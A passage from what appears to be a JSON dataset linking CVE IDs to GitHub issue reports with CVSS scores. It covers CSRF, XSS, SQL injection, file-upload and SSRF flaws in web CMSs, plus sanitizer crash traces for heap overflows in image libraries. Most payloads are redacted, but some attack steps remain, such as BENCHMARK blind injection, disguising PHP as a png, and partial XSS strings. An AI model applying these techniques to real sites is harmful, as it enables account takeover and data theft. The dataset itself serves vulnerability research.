PATHTAG NUMBERTAG b NUMBERTAG in APITAG ( PATHTAG NUMBERTAG f NUMBERTAG ee8b3a in APITAG ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG d3b in APITAG std::char_traits APITAG , std::allocator APITAG > const&) ( PATHTAG NUMBERTAG d7 in main ( PATHTAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow NUMBERTAG APITAG const&, int, APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa NUMBERTAG fa fa fa fd fd fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9df0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fa fa fa fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa POC2 URLTAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef3e at pc NUMBERTAG ff NUMBERTAG f NUMBERTAG f NUMBERTAG bp NUMBERTAG ffde NUMBERTAG sp NUMBERTAG ffde NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ef3e thread T NUMBERTAG ff NUMBERTAG f NUMBERTAG f NUMBERTAG in bool APITAG APITAG char >(unsigned char ) ( PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ebd in std::iterator_traits<unsigned char >::difference_type std::__count_if<unsigned char , APITAG const> >(unsigned char , unsigned char , APITAG const>) ( PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG d NUMBERTAG in std::iterator_traits<unsigned char >::difference_type std::count<unsigned char , char>(unsigned char , unsigned char , char const&) ( PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ef in APITAG const&, int, APITAG ( PATHTAG NUMBERTAG ff NUMBERTAG f6f9e7 in APITAG , APITAG const&, APITAG ( PATHTAG NUMBERTAG ff NUMBERTAG eafe NUMBERTAG in APITAG ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG d3b in APITAG std::char_traits APITAG , std::allocator APITAG > const&) ( PATHTAG NUMBERTAG d7 in main ( PATHTAG NUMBERTAG ff NUMBERTAG c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG de8 in _start ( PATHTAG NUMBERTAG ef3e is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG ff NUMBERTAG a5aa6b2 in operator APITAG long) ( PATHTAG NUMBERTAG b NUMBERTAG in APITAG ( PATHTAG NUMBERTAG ff NUMBERTAG eafb3a in APITAG ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG d3b in APITAG std::char_traits APITAG , std::allocator APITAG > const&) ( PATHTAG NUMBERTAG d7 in main ( PATHTAG NUMBERTAG ff NUMBERTAG c NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow NUMBERTAG bool APITAG APITAG char >(unsigned char ) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9df0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fa fa fa fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa",
  24345. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  24346. "severity": "MEDIUM",
  24347. "baseScore": 6.5,
  24348. "impactScore": 3.6,
  24349. "exploitabilityScore": 2.8
  24350. },
  24351. {
  24352. "CVE_ID": "CVE-2018-16337",
  24353. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/2",
  24354. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/2",
  24355. "Repo_new": "chshcms/cscms",
  24356. "Issue_Created_At": "2018-08-11T02:01:08Z",
  24357. "description": "There is a CSRF vulnerability that can modify website basic configuration NUMBERTAG before modification FILETAG NUMBERTAG CSRF POC FILETAG FILETAG NUMBERTAG after modification FILETAG NUMBERTAG CSRF POC FILETAG",
  24358. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  24359. "severity": "MEDIUM",
  24360. "baseScore": 6.5,
  24361. "impactScore": 3.6,
  24362. "exploitabilityScore": 2.8
  24363. },
  24364. {
  24365. "CVE_ID": "CVE-2018-16338",
  24366. "Issue_Url_old": "https://github.com/auracms/AuraCMS/issues/3",
  24367. "Issue_Url_new": "https://github.com/auracms/auracms/issues/3",
  24368. "Repo_new": "auracms/auracms",
  24369. "Issue_Created_At": "2018-08-13T08:34:23Z",
  24370. "description": "There is a cross site request forgery vulnerability in FILETAG . There is a cross site request forgery vulnerability in APITAG It and can change administrator's password. First: After the administrator logged in,open the poc page. FILETAG to FILETAG NUMBERTAG add page NUMBERTAG add APITAG topic NUMBERTAG add page FILETAG FILETAG NUMBERTAG add menu FILETAG FILETAG FILETAG NUMBERTAG submit topic FILETAG FILETAG NUMBERTAG CSRF POC: FILETAG",
  24371. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24372. "severity": "HIGH",
  24373. "baseScore": 8.8,
  24374. "impactScore": 5.9,
  24375. "exploitabilityScore": 2.8
  24376. },
  24377. {
  24378. "CVE_ID": "CVE-2018-16339",
  24379. "Issue_Url_old": "https://github.com/sbmzhcn/EmpireCMS/issues/1",
  24380. "Issue_Url_new": "https://github.com/leadscloud/empirecms/issues/1",
  24381. "Repo_new": "leadscloud/empirecms",
  24382. "Issue_Created_At": "2018-08-11T04:49:37Z",
  24383. "description": "There is a CSRF vulnerability that can add administrator.. After the administrator logged in,open the poc page. copy FILETAG to FILETAG and let the administrator open the FILETAG vulnerability PATHTAG Before modification FILETAG FILETAG After modification FILETAG Poc location: FILETAG",
  24384. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24385. "severity": "HIGH",
  24386. "baseScore": 8.8,
  24387. "impactScore": 5.9,
  24388. "exploitabilityScore": 2.8
  24389. },
  24390. {
  24391. "CVE_ID": "CVE-2018-16342",
  24392. "Issue_Url_old": "https://github.com/star7th/showdoc/issues/325",
  24393. "Issue_Url_new": "https://github.com/star7th/showdoc/issues/325",
  24394. "Repo_new": "star7th/showdoc",
  24395. "Issue_Created_At": "2018-07-30T12:02:55Z",
  24396. "description": "We found a stored xss vulnerability in APITAG Hello friend,we are farmsec security team,we found a stored xss vulnerability in APITAG APITAG to register FILETAG APITAG in user information FILETAG Click to register. APITAG a new project FILETAG Click new project. APITAG in the project information FILETAG Click submit. APITAG on the new project FILETAG Click on the new project xss test APITAG + to create a new page FILETAG APITAG in the xss vulnerability test payload payload: ERRORTAG Click save FILETAG Access page FILETAG APITAG the user's cookie information FILETAG",
  24397. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  24398. "severity": "MEDIUM",
  24399. "baseScore": 5.4,
  24400. "impactScore": 2.7,
  24401. "exploitabilityScore": 2.3
  24402. },
  24403. {
  24404. "CVE_ID": "CVE-2018-16345",
  24405. "Issue_Url_old": "https://github.com/teameasy/EasyCMS/issues/5",
  24406. "Issue_Url_new": "https://github.com/teameasy/easycms/issues/5",
  24407. "Repo_new": "teameasy/easycms",
  24408. "Issue_Created_At": "2018-07-26T03:55:04Z",
  24409. "description": "There is two CSRF vulnerability that can add a ordinary user and update the administrator password. After the administrator logged in, open the following page poc: FILETAG update the admin password CODETAG FILETAG add a ordinary user CODETAG",
  24410. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24411. "severity": "HIGH",
  24412. "baseScore": 8.8,
  24413. "impactScore": 5.9,
  24414. "exploitabilityScore": 2.8
  24415. },
  24416. {
  24417. "CVE_ID": "CVE-2018-16346",
  24418. "Issue_Url_old": "https://github.com/chemcms/ChemCMS/issues/2",
  24419. "Issue_Url_new": "https://github.com/chemcms/chemcms/issues/2",
  24420. "Repo_new": "chemcms/chemcms",
  24421. "Issue_Created_At": "2018-07-30T11:52:13Z",
  24422. "description": "There is a xss vulnerability APITAG Privilege. A xss vulnerability was discovered in APITAG step NUMBERTAG login the backstage step NUMBERTAG go to the page setting >website information and fill the poc APITAG alert(\"xss\") APITAG to statistic code FILETAG",
  24423. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  24424. "severity": "MEDIUM",
  24425. "baseScore": 4.8,
  24426. "impactScore": 2.7,
  24427. "exploitabilityScore": 1.7
  24428. },
  24429. {
  24430. "CVE_ID": "CVE-2018-16347",
  24431. "Issue_Url_old": "https://github.com/gleez/cms/issues/798",
  24432. "Issue_Url_new": "https://github.com/gleez/cms/issues/798",
  24433. "Repo_new": "gleez/cms",
  24434. "Issue_Created_At": "2018-08-09T08:17:45Z",
  24435. "description": "There is a XSS vulnerability that can execute javascript. Founded in your demo site. URLTAG Visit this address with Firefox browser and it shows a forbidden page APITAG Then insert the payload APITAG alert NUMBERTAG APITAG then u can see this page alert NUMBERTAG at once. APITAG Obviously, some js code can be executed.",
  24436. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24437. "severity": "MEDIUM",
  24438. "baseScore": 6.1,
  24439. "impactScore": 2.7,
  24440. "exploitabilityScore": 2.8
  24441. },
  24442. {
  24443. "CVE_ID": "CVE-2018-16349",
  24444. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/147",
  24445. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/147",
  24446. "Repo_new": "wuzhicms/wuzhicms",
  24447. "Issue_Created_At": "2018-07-28T15:31:07Z",
  24448. "description": "wuzhicms NUMBERTAG has a XSS vulnerability in form FILETAG CODETAG When administrators access the expansion module link, it triggers XSS vulnerability. FILETAG image URLTAG",
  24449. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24450. "severity": "MEDIUM",
  24451. "baseScore": 6.1,
  24452. "impactScore": 2.7,
  24453. "exploitabilityScore": 2.8
  24454. },
  24455. {
  24456. "CVE_ID": "CVE-2018-16350",
  24457. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/148",
  24458. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/148",
  24459. "Repo_new": "wuzhicms/wuzhicms",
  24460. "Issue_Created_At": "2018-07-28T15:32:20Z",
  24461. "description": "wuzhicms NUMBERTAG has a XSS vulnerability in form FILETAG CODETAG When an administrator accesses the CMS home page, it triggers a XSS vulnerability FILETAG FILETAG",
  24462. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24463. "severity": "MEDIUM",
  24464. "baseScore": 6.1,
  24465. "impactScore": 2.7,
  24466. "exploitabilityScore": 2.8
  24467. },
  24468. {
  24469. "CVE_ID": "CVE-2018-16352",
  24470. "Issue_Url_old": "https://github.com/alterebro/WeaselCMS/issues/8",
  24471. "Issue_Url_new": "https://github.com/alterebro/weaselcms/issues/8",
  24472. "Repo_new": "alterebro/weaselcms",
  24473. "Issue_Created_At": "2018-08-25T12:20:05Z",
  24474. "description": "There is a .php file upload Vulnerbility. There is a .php file upload Vulnerbility in FILETAG FILETAG use mime type to forbidden php file is not safe,we can first edit the png file's name FILETAG then add the php code at the end FILETAG file was uploaded successfully! FILETAG",
  24475. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  24476. "severity": "CRITICAL",
  24477. "baseScore": 9.8,
  24478. "impactScore": 5.9,
  24479. "exploitabilityScore": 3.9
  24480. },
  24481. {
  24482. "CVE_ID": "CVE-2018-16353",
  24483. "Issue_Url_old": "https://github.com/focalhot/FHCRM/issues/3",
  24484. "Issue_Url_new": "https://github.com/focalhot/fhcrm/issues/3",
  24485. "Repo_new": "focalhot/FHCRM",
  24486. "Issue_Created_At": "2018-08-08T04:09:20Z",
  24487. "description": "there is a sql injection via PATHTAG FILETAG there is a sql injection via $limit parameter we can use the function BENCHMARK to excute blind injection FILETAG FILETAG",
  24488. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  24489. "severity": "CRITICAL",
  24490. "baseScore": 9.8,
  24491. "impactScore": 5.9,
  24492. "exploitabilityScore": 3.9
  24493. },
  24494. {
  24495. "CVE_ID": "CVE-2018-16354",
  24496. "Issue_Url_old": "https://github.com/focalhot/FHCRM/issues/4",
  24497. "Issue_Url_new": "https://github.com/focalhot/fhcrm/issues/4",
  24498. "Repo_new": "focalhot/FHCRM",
  24499. "Issue_Created_At": "2018-08-08T08:25:20Z",
  24500. "description": "There is a sql injection via PATHTAG FILETAG there is a sql injection via $limit parameter we can use the function BENCHMARK to excute blind injection payload: URLTAG PROCEDURE APITAG LIKE NUMBERTAG APITAG FILETAG the response time will be longer if the first the first number of mysql version is NUMBERTAG FILETAG",
  24501. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  24502. "severity": "CRITICAL",
  24503. "baseScore": 9.8,
  24504. "impactScore": 5.9,
  24505. "exploitabilityScore": 3.9
  24506. },
  24507. {
  24508. "CVE_ID": "CVE-2018-16362",
  24509. "Issue_Url_old": "https://github.com/mantisbt-plugins/source-integration/issues/286",
  24510. "Issue_Url_new": "https://github.com/mantisbt-plugins/source-integration/issues/286",
  24511. "Repo_new": "mantisbt-plugins/source-integration",
  24512. "Issue_Created_At": "2018-09-01T18:04:58Z",
  24513. "description": "x.",
  24514. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24515. "severity": "MEDIUM",
  24516. "baseScore": 6.1,
  24517. "impactScore": 2.7,
  24518. "exploitabilityScore": 2.8
  24519. },
  24520. {
  24521. "CVE_ID": "CVE-2018-16365",
  24522. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/32",
  24523. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/32",
  24524. "Repo_new": "idreamsoft/iCMS",
  24525. "Issue_Created_At": "2018-08-01T00:44:41Z",
  24526. "description": "There is one CSRF vulnerability that can add the administrator account. Although the Token value is set, the Token value is displayed in the Get request and does not change. The system also has a referer detection, so the environment is set up on the server, bypassing the referer detection. Vulnerability PATHTAG poc\uff1a APITAG APITAG APITAG APITAG APITAG APITAG PATHTAG ) APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  24527. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24528. "severity": "HIGH",
  24529. "baseScore": 8.8,
  24530. "impactScore": 5.9,
  24531. "exploitabilityScore": 2.8
  24532. },
  24533. {
  24534. "CVE_ID": "CVE-2018-16367",
  24535. "Issue_Url_old": "https://github.com/QingdaoU/OnlineJudge/issues/165",
  24536. "Issue_Url_new": "https://github.com/qingdaou/onlinejudge/issues/165",
  24537. "Repo_new": "qingdaou/onlinejudge",
  24538. "Issue_Created_At": "2018-08-09T14:16:20Z",
  24539. "description": "There is a incorrect access control vulnerability that can write file anywhere. \u5728\u63d0\u4ea4issue\u4e4b\u524d\u8bf7 \u8ba4\u771f\u9605\u8bfb\u6587\u6863 URLTAG \u641c\u7d22\u548c\u67e5\u770b\u5386\u53f2issues \u7136\u540e\u63d0\u4ea4issue\u8bf7\u5199\u6e05\u695a\u4e0b\u5217\u4e8b\u9879 \u00a0 \u8fdb\u884c\u4ec0\u4e48\u64cd\u4f5c\u7684\u65f6\u5019\u9047\u5230\u4e86\u4ec0\u4e48\u95ee\u9898\uff0c\u6700\u597d\u80fd\u6709\u590d\u73b0\u6b65\u9aa4 \u00a0 APITAG \u4f60\u5c1d\u8bd5\u4fee\u590d\u95ee\u9898\u7684\u64cd\u4f5c \u9875\u9762\u95ee\u9898\u8bf7\u5199\u6e05\u6d4f\u89c8\u5668\u7248\u672c\uff0c\u5c3d\u91cf\u6709\u622a\u56fe",
  24540. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
  24541. "severity": "CRITICAL",
  24542. "baseScore": 9.9,
  24543. "impactScore": 6.0,
  24544. "exploitabilityScore": 3.1
  24545. },
  24546. {
  24547. "CVE_ID": "CVE-2018-16371",
  24548. "Issue_Url_old": "https://github.com/lazyphp/PESCMS-TEAM/issues/3",
  24549. "Issue_Url_new": "https://github.com/lazyphp/pescms-team/issues/3",
  24550. "Repo_new": "lazyphp/pescms-team",
  24551. "Issue_Created_At": "2018-08-30T15:30:44Z",
  24552. "description": "PECSM TEAM NUMBERTAG has multiple reflected Cross Site Scripting Vulnerability. I found multiple reflected cross site scripting vulnerability where the page use FILETAG ,we can see where is no XSS filter in \"keyword\" parameter. FILETAG now I input payload :aa\"> APITAG the full url is : URLTAG and the code is running FILETAG and there are lots of pages use APITAG they all have reflected cross site scripting APITAG URLTAG URLTAG URLTAG URLTAG .. .. ..",
  24553. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24554. "severity": "MEDIUM",
  24555. "baseScore": 6.1,
  24556. "impactScore": 2.7,
  24557. "exploitabilityScore": 2.8
  24558. },
  24559. {
  24560. "CVE_ID": "CVE-2018-16372",
  24561. "Issue_Url_old": "https://github.com/iechoo/ideacms/issues/1",
  24562. "Issue_Url_new": "https://github.com/iechoo/ideacms/issues/1",
  24563. "Repo_new": "iechoo/ideacms",
  24564. "Issue_Created_At": "2018-08-07T08:41:11Z",
  24565. "description": "Ideacms has a reflected Cross Site Scripting Vulnerability. I have found a reflected Cross Site Scripting Vulnerability. The parameter \u2018kw\u2019 lack of xss_clean function to checkout user's input ,that cause a reflected xss vulnerability. payload\uff1a APITAG FILETAG",
  24566. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24567. "severity": "MEDIUM",
  24568. "baseScore": 6.1,
  24569. "impactScore": 2.7,
  24570. "exploitabilityScore": 2.8
  24571. },
  24572. {
  24573. "CVE_ID": "CVE-2018-16373",
  24574. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/13",
  24575. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/13",
  24576. "Repo_new": "philippe/frogcms",
  24577. "Issue_Created_At": "2018-08-24T07:29:45Z",
  24578. "description": "Frog CMS NUMBERTAG has a file upload Vulnerability in PATHTAG When I check this function ,I found out in line NUMBERTAG we can see if filename did not exists,we can also upload a new file and new content throuth APITAG function,and in line NUMBERTAG file create directly. FILETAG then i try to upload a new filename and new content in this request FILETAG and the code is running FILETAG",
  24579. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
  24580. "severity": "MEDIUM",
  24581. "baseScore": 4.9,
  24582. "impactScore": 3.6,
  24583. "exploitabilityScore": 1.2
  24584. },
  24585. {
  24586. "CVE_ID": "CVE-2018-16374",
  24587. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/14",
  24588. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/14",
  24589. "Repo_new": "philippe/frogcms",
  24590. "Issue_Created_At": "2018-08-28T14:53:56Z",
  24591. "description": "Frog CMS NUMBERTAG has a stored Cross Site Scripting Vulnerability. I have found a stored Cross Site Scripting vulnerability in URLTAG FILETAG When I click save button,the http request like this: FILETAG And the rowspage parameter was not XSS filtered resulting in storage XSS vulnerability FILETAG EXP is as follows: FILETAG The result of EXP is as follows: FILETAG",
  24592. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  24593. "severity": "MEDIUM",
  24594. "baseScore": 4.8,
  24595. "impactScore": 2.7,
  24596. "exploitabilityScore": 1.7
  24597. },
  24598. {
  24599. "CVE_ID": "CVE-2018-16375",
  24600. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1126",
  24601. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1126",
  24602. "Repo_new": "uclouvain/openjpeg",
  24603. "Issue_Created_At": "2018-07-26T12:31:16Z",
  24604. "description": "Missing checks for APITAG and APITAG in function pnmtoimage in PATHTAG which can lead to heap buffer overflow. Function pnmtoimage in PATHTAG misses checks for APITAG and APITAG which can lead to heap buffer overflow. (see NUMBERTAG CODETAG Below is the proposal patch. CODETAG",
  24605. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24606. "severity": "HIGH",
  24607. "baseScore": 8.8,
  24608. "impactScore": 5.9,
  24609. "exploitabilityScore": 2.8
  24610. },
  24611. {
  24612. "CVE_ID": "CVE-2018-16376",
  24613. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1127",
  24614. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1127",
  24615. "Repo_new": "uclouvain/openjpeg",
  24616. "Issue_Created_At": "2018-07-26T12:39:30Z",
  24617. "description": "Potential heap based buffer overflow in function t2_encode_packet in PATHTAG . There are two missing checks for length in function t2_encode_packet in PATHTAG . (see NUMBERTAG ERRORTAG Below is the proposal patch for t2_encode_packet function. ERRORTAG",
  24618. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24619. "severity": "HIGH",
  24620. "baseScore": 8.8,
  24621. "impactScore": 5.9,
  24622. "exploitabilityScore": 2.8
  24623. },
  24624. {
  24625. "CVE_ID": "CVE-2018-16380",
  24626. "Issue_Url_old": "https://github.com/n00dles/ogma-CMS/issues/39",
  24627. "Issue_Url_new": "https://github.com/n00dles/ogma-cms/issues/39",
  24628. "Repo_new": "n00dles/ogma-CMS",
  24629. "Issue_Created_At": "2018-08-22T12:26:42Z",
  24630. "description": "Here's a CSRF vulnerability NUMBERTAG Here's a CSRF vulnerability. Due to the lack of corresponding verification measures, when the administrator logs into the background of the website, the malicious HTML file constructed by the attacker will be automatically added to the administrator account. An attacker can log into the background as an administrator for a series of operations. POC: CODETAG Finally, the file is executed and the administrator account is successfully executed. FILETAG",
  24631. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24632. "severity": "HIGH",
  24633. "baseScore": 8.8,
  24634. "impactScore": 5.9,
  24635. "exploitabilityScore": 2.8
  24636. },
  24637. {
  24638. "CVE_ID": "CVE-2018-16385",
  24639. "Issue_Url_old": "https://github.com/top-think/framework/issues/1375",
  24640. "Issue_Url_new": "https://github.com/top-think/framework/issues/1375",
  24641. "Repo_new": "top-think/framework",
  24642. "Issue_Created_At": "2018-08-10T09:32:09Z",
  24643. "description": "APITAG SQL\u6ce8\u5165\u6f0f\u6d1e. \u6f0f\u6d1e\u5229\u7528 \u6f0f\u6d1edemo\u4ee3\u7801\uff1a ERRORTAG \u6f0f\u6d1e\u539f\u56e0\u662f\u5904\u7406order by\u53c2\u6570\u65f6\uff0c\u5982\u679c\u53c2\u6570\u7528\u6237\u53ef\u63a7\uff0c\u5f53\u53c2\u6570\u4e3a\u6570\u7ec4key APITAG \u8bbf\u95ee\u5982\u4e0b\u94fe\u63a5\u5373\u53ef\u89e6\u53d1SQL\u6ce8\u5165\u6f0f\u6d1e\uff1a APITAG FILETAG \u53ef\u4ee5\u770b\u5230\u6211\u4eec\u6210\u529f\u83b7\u53d6\u5230\u6570\u636e\u5e93\u4e2d\u7684\u5f53\u524d\u7528\u6237\u540d\u3002 \u4fee\u590d\u5efa\u8bae \u5bf9order by\u8bed\u53e5\u5904\u7406\u6d41\u7a0b\u52a0\u4e0a\u6570\u7ec4\u5206\u652f\u5b89\u5168\u6821\u9a8c\u3002",
  24644. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  24645. "severity": "CRITICAL",
  24646. "baseScore": 9.8,
  24647. "impactScore": 5.9,
  24648. "exploitabilityScore": 3.9
  24649. },
  24650. {
  24651. "CVE_ID": "CVE-2018-16387",
  24652. "Issue_Url_old": "https://github.com/jbroadway/elefant/issues/285",
  24653. "Issue_Url_new": "https://github.com/jbroadway/elefant/issues/285",
  24654. "Repo_new": "jbroadway/elefant",
  24655. "Issue_Created_At": "2018-08-09T09:00:46Z",
  24656. "description": "There is a CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following page poc\uff1a APITAG add a admin ERRORTAG",
  24657. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24658. "severity": "HIGH",
  24659. "baseScore": 8.8,
  24660. "impactScore": 5.9,
  24661. "exploitabilityScore": 2.8
  24662. },
  24663. {
  24664. "CVE_ID": "CVE-2018-16409",
  24665. "Issue_Url_old": "https://github.com/gogs/gogs/issues/5372",
  24666. "Issue_Url_new": "https://github.com/gogs/gogs/issues/5372",
  24667. "Repo_new": "gogs/gogs",
  24668. "Issue_Created_At": "2018-08-09T08:33:32Z",
  24669. "description": "server side request forgery (SSRF) vulnerability in migrate. Gogs version (or commit ref NUMBERTAG Can you reproduce the bug at FILETAG x ] Yes ( URLTAG [ ] No [ ] Not relevant Log gist (usually found in APITAG ): Description attacker may use [migrate URLTAG to send arbitrary http get requests. impact just like NUMBERTAG APITAG Patch only allow migration from trusted sources URLTAG salt of Tencent's Xuanwu Lab",
  24670. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
  24671. "severity": "HIGH",
  24672. "baseScore": 8.6,
  24673. "impactScore": 4.0,
  24674. "exploitabilityScore": 3.9
  24675. },
  24676. {
  24677. "CVE_ID": "CVE-2018-16413",
  24678. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1251",
  24679. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1251",
  24680. "Repo_new": "imagemagick/imagemagick",
  24681. "Issue_Created_At": "2018-08-19T14:25:19Z",
  24682. "description": "heap buffer overflow bug in APITAG APITAG APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description I used fuzz technology to fuzz the imagemagick and found a heap overflow bug. Steps to Reproduce APITAG NUMBERTAG a NUMBERTAG b NUMBERTAG fa fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG a NUMBERTAG c0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd NUMBERTAG a NUMBERTAG d0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa NUMBERTAG a NUMBERTAG e0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG a NUMBERTAG f0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd NUMBERTAG a NUMBERTAG fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc APITAG internal: fe NUMBERTAG ABORTING System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS NUMBERTAG arch PATHTAG uname a Linux ubuntu 